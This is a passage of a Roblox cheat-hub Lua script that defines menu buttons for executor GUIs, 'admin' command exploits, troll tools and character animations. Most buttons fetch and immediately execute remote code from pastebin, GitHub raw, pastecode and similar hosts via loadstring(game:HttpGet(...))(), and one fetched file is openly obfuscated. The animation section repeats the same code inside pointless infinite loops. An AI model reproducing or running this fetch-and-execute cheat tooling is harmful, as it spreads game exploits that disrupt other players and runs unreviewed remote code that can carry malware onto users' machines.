loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Project-RC7-6752"))()
724
end)
725
SkriptsSection:NewButton("Rc7 exekutor(new)", "request by emil", function()
726
--[[
727
Rc7 exe gui new
728
]]
729
loadstring(game:HttpGet("https://raw.githubusercontent.com/CoreGui/Scripts/main/RC7"))()
730
end)
731
SkriptsSection:NewButton("Rx7 exekutor gui 2 new version", "rc7",
732
function()
733
loadstring(game:HttpGet("https://raw.githubusercontent.com/SyrixHax/RC7/Version/Rbx"))()
734
-- rx7 exekutor gui 2 new version
735
end)
736
SkriptsSection:NewButton("Synapse X (old gui)", "synapse x",
737
function()loadstring(game:HttpGet("https://pastebin.com/raw/1fAnGAA0"))()
738
-- Synapse x skript old gui
739
end)
740
SkriptsSection:NewButton("Synapse X", "shadow x",
741
function()loadstring(game:HttpGet("https://pastebin.com/raw/2qjBZB1Y"))()
742
-- shadow x exe gui
743
end)
744
SkriptsSection:NewButton("Synapse X Rework", "exe gui",
745
function()
746
loadstring(game:HttpGet("https://pastebin.com/raw/tWGxhNq0"))()
747
-- Synapse x rework
748
end)
749
SkriptsSection:NewButton("Nokom exe", "shadow x gui",
750
function()loadstring(game:HttpGet("https://raw.githubusercontent.com/YellowGreg/NoCom-Executor/main/NoCom"))()
751
-- nokom exe gui
752
end)
753
SkriptsSection:NewButton("Exekutor gui", "exe gui",
754
function()
755
loadstring(game:HttpGet("https://pastebin.com/raw/yGxeT8zC", true))()
756
-- exekutor gui
757
end)
758
759
--r15 animationz
760
local SkriptsSection = Skripts:NewSection("R15 Animation")
761
762
SkriptsSection:NewButton("Zombie Animation", "R15 animation", function()
763
while true do
764
wait(1)
765
for i, player in ipairs(game.Players:GetChildren()) do
766
local Animate = game.Players.LocalPlayer.Character.Animate
767
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616158929"
768
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616160636"
769
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616168032"
770
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616163682"
771
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616161997"
772
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=616156119"
773
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616157476"
774
game.Players.LocalPlayer.Character.Humanoid.Jump = false
775
end
776
end
777
end)
778
SkriptsSection:NewButton("Kartoony Animation", "R15 animation", function()
779
while true do
780
wait(1)
781
for i, player in ipairs(game.Players:GetChildren()) do
782
local Animate = game.Players.LocalPlayer.Character.Animate
783
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=742637544"
784
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=742638445"
785
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=742640026"
786
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=742638842"
787
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=742637942"
788
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=742636889"
789
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=742637151"
790
game.Players.LocalPlayer.Character.Humanoid.Jump = false
791
end
792
end
793
end)
794
795
SkriptsSection:NewButton("Astronaut", "lokal skript", function()
796
while true do
797
wait(1)
798
for i, player in ipairs(game.Players:GetChildren()) do
799
local Animate = game.Players.LocalPlayer.Character.Animate
800
local Animate = game.Players.LocalPlayer.Character.Animate
801
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=891621366"
802
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=891633237"
803
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=891667138"
804
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=891636393"
805
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=891627522"
806
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=891609353"
807
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=891617961"
808
game.Players.LocalPlayer.Character.Humanoid.Jump = false
809
end
810
end
811
end)
812
813
SkriptsSection:NewButton("Bubbly", "lokal skript", function()
814
while true do
815
wait(1)
816
for i, player in ipairs(game.Players:GetChildren()) do
817
local Animate = game.Players.LocalPlayer.Character.Animate
818
local Animate = game.Players.LocalPlayer.Character.Animate
819
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=910004836"
820
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=910009958"
821
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=910034870"
822
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=910025107"
823
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=910016857"
824
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=910001910"
825
Animate.swimidle.SwimIdle.AnimationId = "http://www.roblox.com/asset/?id=910030921"
826
Animate.swim.Swim.AnimationId = "http://www.roblox.com/asset/?id=910028158"
827
game.Players.LocalPlayer.Character.Humanoid.Jump = false
828
end
829
end
830
end)
831
832
SkriptsSection:NewButton("Elder", "lokal skript", function()
833
while true do
834
wait(1)
835
for i, player in ipairs(game.Players:GetChildren()) do
836
local Animate = game.Players.LocalPlayer.Character.Animate
837
local Animate = game.Players.LocalPlayer.Character.Animate
838
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=845400520"
839
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=845403856"
840
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=845386501"
841
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=845398858"
842
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=845392038"
843
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=845396048"
844
game.Players.LocalPlayer.Character.Humanoid.Jump = false
845
end
846
end
847
end)
848
849
SkriptsSection:NewButton("Knight", "lokal skript", function()
850
while true do
851
wait(1)
852
for i, player in ipairs(game.Players:GetChildren()) do
853
local Animate = game.Players.LocalPlayer.Character.Animate
854
local Animate = game.Players.LocalPlayer.Character.Animate
855
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616006778"
856
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616008087"
857
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616013216"
858
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616010382"
859
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616008936"
860
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=616003713"
861
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616005863"
862
game.Players.LocalPlayer.Character.Humanoid.Jump = false
863
end
864
end
865
end)
866
867
SkriptsSection:NewButton("Levitation", "lokal skript", function()
868
while true do
869
wait(1)
870
for i, player in ipairs(game.Players:GetChildren()) do
871
local Animate = game.Players.LocalPlayer.Character.Animate
872
local Animate = game.Players.LocalPlayer.Character.Animate
873
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=750781874"
874
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=750782770"
875
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=750785693"
876
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=750783738"
877
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=750782230"
878
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=750779899"
879
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=750780242"
880
game.Players.LocalPlayer.Character.Humanoid.Jump = false
881
end
882
end
883
end)
884
885
SkriptsSection:NewButton("Mage", "lokal skript", function()
886
while true do
887
wait(1)
888
for i, player in ipairs(game.Players:GetChildren()) do
889
local Animate = game.Players.LocalPlayer.Character.Animate
890
local Animate = game.Players.LocalPlayer.Character.Animate
891
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=707742142"
892
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=707855907"
893
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=707897309"
894
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=707861613"
895
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=707853694"
896
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=707826056"
897
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=707829716"
898
game.Players.LocalPlayer.Character.Humanoid.Jump = false
899
end
900
end
901
end)
902
SkriptsSection:NewButton("Ninja", "lokal skripts", function()
903
while true do
904
wait(1)
905
for i, player in ipairs(game.Players:GetChildren()) do
906
local Animate = game.Players.LocalPlayer.Character.Animate
907
local Animate = game.Players.LocalPlayer.Character.Animate
908
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=656117400"
909
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=656118341"
910
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=656121766"
911
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=656118852"
912
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=656117878"
913
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=656114359"
914
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=656115606"
915
game.Players.LocalPlayer.Character.Humanoid.Jump = false
916
end
917
end
918
end)
919
920
SkriptsSection:NewButton("Pirate", "lokal skripts", function()
921
while true do
922
wait(1)
923
for i, player in ipairs(game.Players:GetChildren()) do
924
local Animate = game.Players.LocalPlayer.Character.Animate
925
local Animate = game.Players.LocalPlayer.Character.Animate
926
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=750781874"
927
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=750782770"
928
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=750785693"
929
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=750783738"
930
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=750782230"
931
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=750779899"
932
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=750780242"
933
game.Players.LocalPlayer.Character.Humanoid.Jump = false
934
end
935
end
936
end)
937
938
SkriptsSection:NewButton("Robot", "lokal skript", function()
939
while true do
940
wait(1)
941
for i, player in ipairs(game.Players:GetChildren()) do
942
local Animate = game.Players.LocalPlayer.Character.Animate
943
local Animate = game.Players.LocalPlayer.Character.Animate
944
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616088211"
945
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616089559"
946
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616095330"
947
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616091570"
948
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616090535"
949
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=616086039"
950
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616087089"
951
game.Players.LocalPlayer.Character.Humanoid.Jump = false
952
end
953
end
954
end)
955
956
SkriptsSection:NewButton("Stylish", "lokal skript", function()
957
while true do
958
wait(1)
959
for i, player in ipairs(game.Players:GetChildren()) do
960
local Animate = game.Players.LocalPlayer.Character.Animate
961
local Animate = game.Players.LocalPlayer.Character.Animate
962
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616136790"
963
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616138447"
964
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616146177"
965
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616140816"
966
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616139451"
967
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=616133594"
968
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616134815"
969
game.Players.LocalPlayer.Character.Humanoid.Jump = false
970
end
971
end
972
end)
973
974
SkriptsSection:NewButton("Superhero", "lokal skript", function()
975
while true do
976
wait(1)
977
for i, player in ipairs(game.Players:GetChildren()) do
978
local Animate = game.Players.LocalPlayer.Character.Animate
979
local Animate = game.Players.LocalPlayer.Character.Animate
980
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616111295"
981
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616113536"
982
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616122287"
983
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616117076"
984
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616115533"
985
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=616104706"
986
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616108001"
987
game.Players.LocalPlayer.Character.Humanoid.Jump = false
988
end
989
end
990
end)
991
992
SkriptsSection:NewButton("Toy", "lokal skript", function()
993
while true do
994
wait(1)
995
for i, player in ipairs(game.Players:GetChildren()) do
996
local Animate = game.Players.LocalPlayer.Character.Animate
997
local Animate = game.Players.LocalPlayer.Character.Animate
998
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=782841498"
999
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=782845736"
1000
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=782843345"
1001
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=782842708"
1002
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=782847020"
1003
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=782843869"
1004
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=782846423"
1005
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1006
end
1007
end
1008
end)
1009
1010
SkriptsSection:NewButton("Vampire", "lokal skript", function()
1011
while true do
1012
wait(1)
1013
for i, player in ipairs(game.Players:GetChildren()) do
1014
local Animate = game.Players.LocalPlayer.Character.Animate
1015
local Animate = game.Players.LocalPlayer.Character.Animate
1016
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=1083445855"
1017
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=1083450166"
1018
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=1083473930"
1019
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=1083462077"
1020
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=1083455352"
1021
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=1083439238"
1022
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=1083443587"
1023
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1024
end
1025
end
1026
end)
1027
1028
SkriptsSection:NewButton("Werewolf", "lokal skript", function()
1029
while true do
1030
wait(1)
1031
for i, player in ipairs(game.Players:GetChildren()) do
1032
local Animate = game.Players.LocalPlayer.Character.Animate
1033
local Animate = game.Players.LocalPlayer.Character.Animate
1034
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=1083195517"
1035
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=1083214717"
1036
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=1083178339"
1037
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=1083216690"
1038
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=1083218792"
1039
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=1083182000"
1040
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=1083189019"
1041
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1042
end
1043
end
1044
end)
1045
1046
SkriptsSection:NewButton("Patrol", "lokal skript", function()
1047
while true do
1048
wait(1)
1049
for i, player in ipairs(game.Players:GetChildren()) do
1050
local Animate = game.Players.LocalPlayer.Character.Animate
1051
local Animate = game.Players.LocalPlayer.Character.Animate
1052
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=1149612882"
1053
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=1150842221"
1054
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=1151231493"
1055
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=1150967949"
1056
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=1148811837"
1057
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=1148811837"
1058
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=1148863382"
1059
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1060
end
1061
end
1062
end)
1063
1064
SkriptsSection:NewButton("Konfident", "lokal skript", function()
1065
while true do
1066
wait(1)
1067
for i, player in ipairs(game.Players:GetChildren()) do
1068
local Animate = game.Players.LocalPlayer.Character.Animate
1069
local Animate = game.Players.LocalPlayer.Character.Animate
1070
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=1069977950"
1071
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=1069987858"
1072
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=1070017263"
1073
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=1070001516"
1074
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=1069984524"
1075
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=1069946257"
1076
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=1069973677"
1077
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1078
end
1079
end
1080
end)
1081
1082
SkriptsSection:NewButton("Ghost", "lokal skript", function()
1083
while true do
1084
wait(1)
1085
for i, player in ipairs(game.Players:GetChildren()) do
1086
local Animate = game.Players.LocalPlayer.Character.Animate
1087
local Animate = game.Players.LocalPlayer.Character.Animate
1088
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616006778"
1089
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616008087"
1090
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616013216"
1091
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616013216"
1092
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616008936"
1093
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616005863"
1094
Animate.swimidle.SwimIdle.AnimationId = "http://www.roblox.com/asset/?id=616012453"
1095
Animate.swim.Swim.AnimationId = "http://www.roblox.com/asset/?id=616011509"
1096
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1097
end
1098
end
1099
end)
1100
1101
SkriptsSection:NewButton("Sneaky", "lokal skript", function()
1102
while true do
1103
wait(1)
1104
for i, player in ipairs(game.Players:GetChildren()) do
1105
local Animate = game.Players.LocalPlayer.Character.Animate
1106
local Animate = game.Players.LocalPlayer.Character.Animate
1107
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=616006778"
1108
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=616008087"
1109
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616013216"
1110
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616013216"
1111
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=616008936"
1112
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=616005863"
1113
Animate.swimidle.SwimIdle.AnimationId = "http://www.roblox.com/asset/?id=616012453"
1114
Animate.swim.Swim.AnimationId = "http://www.roblox.com/asset/?id=616011509"
1115
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1116
end
1117
end
1118
end)
1119
1120
SkriptsSection:NewButton("Prinxess", "lokal skript", function()
1121
while true do
1122
wait(1)
1123
for i, player in ipairs(game.Players:GetChildren()) do
1124
local Animate = game.Players.LocalPlayer.Character.Animate
1125
local Animate = game.Players.LocalPlayer.Character.Animate
1126
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=941003647"
1127
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=941013098"
1128
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=941028902"
1129
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=941015281"
1130
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=941008832"
1131
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=940996062"
1132
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=941000007"
1133
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1134
end
1135
end
1136
end)
1137
1138
SkriptsSection:NewButton("No Animation", "lokal skript", function()
1139
while true do
1140
wait(1)
1141
for i, player in ipairs(game.Players:GetChildren()) do
1142
local Animate = game.Players.LocalPlayer.Character.Animate
1143
local Animate = game.Players.LocalPlayer.Character.Animate
1144
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=0"
1145
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=0"
1146
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=0"
1147
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=0"
1148
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=0"
1149
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=0"
1150
Animate.swimidle.SwimIdle.AnimationId = "http://www.roblox.com/asset/?id=0"
1151
Animate.swim.Swim.AnimationId = "http://www.roblox.com/asset/?id=0"
1152
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1153
end
1154
end
1155
end)
1156
1157
SkriptsSection:NewButton("Athro", "lokal skript", function()
1158
while true do
1159
wait(1)
1160
for i, player in ipairs(game.Players:GetChildren()) do
1161
local Animate = game.Players.LocalPlayer.Character.Animate
1162
local Animate = game.Players.LocalPlayer.Character.Animate
1163
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=2510196951"
1164
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=2510197257"
1165
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=2510202577"
1166
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=2510198475"
1167
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=2510197830"
1168
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=2510192778"
1169
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=2510195892"
1170
game.Players.LocalPlayer.Character.Humanoid.Jump = false
1171
end
1172
end
1173
end)
1174
1175
1176
1177
1178
-- admin skripts
1179
local Admin = Window:NewTab("Admin")
1180
local AdminSection = Admin:NewSection("Admin Kommands")
1181
AdminSection:NewButton("Infinite Yield", "type the kommand in the kommand bar", function()
1182
loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
1183
end)
1184
AdminSection:NewButton("Infinite Yield Mobile setting", "has a Keep Ui Open option settings", function()
1185
loadstring(game:HttpGet("https://pastecode.dev/raw/nw589b1f/infiniteyield-mobile",true))()
1186
end)
1187
AdminSection:NewButton("Fates Admin", "default prefix :", function()
1188
loadstring(game:HttpGet("https://raw.githubusercontent.com/fatesc/fates-admin/main/main.lua"))()
1189
end)
1190
AdminSection:NewButton("Reviz Admin", "default prefix ; say ;cmds", function()
1191
loadstring(game:HttpGet("https://pastebin.com/raw/RqaZUrBZ"))()
1192
end)
1193
1194
AdminSection:NewButton("Universal Admin Panel", "admin panel", function()
1195
-- unvrsl admin --
1196
loadstring(game:HttpGet(('https://pastefy.app/Oic24KzG/raw'),true))()
1197
end)
1198
AdminSection:NewButton("IV Admin v3", "admin kommands", function()
1199
--[[
1200
Iv admin v3
1201
]]
1202
loadstring(game:HttpGet("https://raw.githubusercontent.com/BloodyBurns/Hex/main/Iv%20Admin%20v3.lua"))()
1203
end)
1204
AdminSection:NewButton("IV Admin", "admin kommands", function()
1205
--[[
1206
Iv admin
1207
]]
1208
loadstring(game:HttpGet("https://pastecode.dev/raw/yX8bQ6ZgUe/ivadmin",true))()
1209
end)
1210
AdminSection:NewButton("Hextus Admin", "admin logs", function()
1211
--[[
1212
hextux admin 1.0.2
1213
]]
1214
loadstring(game:HttpGet("https://raw.githubusercontent.com/BonBonTheDev/Hextus/main/Hextus.lua",true))()
1215
end)
1216
AdminSection:NewButton("Vortex Admin", "admin", function()
1217
loadstring(game:HttpGet("https://raw.githubusercontent.com/Sidhsksjsjsh/Fe-Vortex-admin-V2/main/VortexCompany/C4/Discord.lua"))()
1218
-- fe vortex admin
1219
end)
1220
AdminSection:NewButton("Brixk Admin", "rewrite", function()
1221
loadstring(game:HttpGet("https://pastecode.dev/raw/uaxYupfcaQ/rewriteBrixkAdmin_lulaslollipop",true))()
1222
end)
1223
AdminSection:NewButton("Gx Admin", "gx admin", function()
1224
loadstring(game:HttpGet("https://pastebin.com/raw/v6E9BmFK",true))();
1225
-- Gx admin
1226
end)
1227
AdminSection:NewButton("Homebrew Admin", "admin", function()
1228
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-or-FE-Homebrew-Admin-3106"))()
1229
-- Homebrew admin
1230
end)
1231
AdminSection:NewButton("Property Admin", "property", function()
1232
--[[
1233
property admin
1234
]]
1235
loadstring(game:HttpGet("https://raw.githubusercontent.com/Copinface/MainSource/main/PropertyAdmin"))()
1236
end)
1237
AdminSection:NewButton("Lion Admin", "property", function()
1238
--[[
1239
lion admin
1240
]]
1241
loadstring(game:HttpGet("https://raw.githubusercontent.com/WCodesEz/Lion-Admin/main/v1.lua"))()
1242
end)
1243
AdminSection:NewButton("Unknown Admin", "hmm", function()
1244
--[[
1245
unknown admin
1246
]]
1247
loadstring(game:HttpGet("https://gist.github.com/someunknowndude/38cecea5be9d75cb743eac8b1eaf6758/raw"))()
1248
-- someunknowndude Admin
1249
end)
1250
AdminSection:NewButton("Legs Admin v2", "leg day", function()
1251
--[[
1252
legs admin v2
1253
]]
1254
loadstring(game:HttpGet('https://raw.githubusercontent.com/leg1337/legadmv2/main/legadminv2.lua'))()
1255
-- Legs admin v2
1256
end)
1257
AdminSection:NewButton("ShatterVast Admin", "shattervast old", function()
1258
--[[
1259
shattervast admin
1260
]]
1261
loadstring(game:HttpGet("https://pastebin.com/raw/m66HEHFu"))()
1262
-- ShatterVast admin
1263
end)
1264
1265
-- OTHER ADMINS
1266
1267
local AdminSection = Admin:NewSection("Troll Admin")
1268
1269
AdminSection:NewButton("Annoying Admin", "type .cmds and then /console to see kmd list", function()
1270
loadstring(game:HttpGet(('https://raw.githubusercontent.com/TheMightySource/FE-Annoying-Admin/main/Main.lua'),true))()
1271
end)
1272
AdminSection:NewButton("Simple Admin", "type .cmds, say (.set prefix ;) to set ; instead of .", function()loadstring(game:HttpGet('https://pastebin.com/raw/3hDQcTaD'))()
1273
end)
1274
1275
1276
1277
-- Fun SKRIPTS
1278
local Fun = Window:NewTab("Fun")
1279
local FunSection = Fun:NewSection("Animations")
1280
1281
FunSection:NewButton("Lolly Animations", "work r15 and r6", function()
1282
loadstring(game:HttpGet('https://raw.githubusercontent.com/yeerma/1/main/the_greatest_script_ever_made'))()
1283
end)
1284
FunSection:NewButton("Energyze Animations", "work r15 and r6", function()loadstring(game:HttpGet(('https://pastebin.com/raw/1p6xnBNf'),true))()
1285
end)
1286
FunSection:NewButton("Be A Helikopter", "human xhoppa", function()-- laydown spin/helikopter
1287
loadstring(game:HttpGet("https://pastebin.com/raw/XP8yfVbk"))()
1288
end)
1289
FunSection:NewButton("Krawl", "simple krawl gui", function()
1290
loadstring(game:HttpGet('https://raw.githubusercontent.com/0Ben1/fe/main/obf_vZDX8j5ggfAf58QhdJ59BVEmF6nmZgq4Mcjt2l8wn16CiStIW2P6EkNc605qv9K4.lua.txt'))()
1291
end)
1292
FunSection:NewButton("R6 pose gui", "pose๐Ÿ“ธ",
1293
function()loadstring(game:HttpGet('https://pastebin.com/raw/sZMn81tZ'))()
1294
end)
1295
1296
FunSection:NewButton("KraxkHead walking", "turn into a krakhead", function()
1297
loadstring(game:HttpGet("https://pastecode.dev/raw/w5QIzqKn/kraxkhead_lulaslollipop",true))()
1298
end)
1299
1300
FunSection:NewButton("Jump to flip", "keybind Jump", function()
1301
loadstring(game:HttpGet("https://pastecode.dev/raw/7nZso3Lj/jumpToFlip_lulaslollipop",true))()
1302
end)
1303
1304
FunSection:NewButton("XD", "XDDDDDDD", function()
1305
loadstring(game:HttpGet("https://pastecode.dev/raw/ch9MnV0j/wiiRemote_lulaslollipop",true))()
1306
end)
1307
1308
local FunSection = Fun:NewSection("Message Fun")
1309
1310
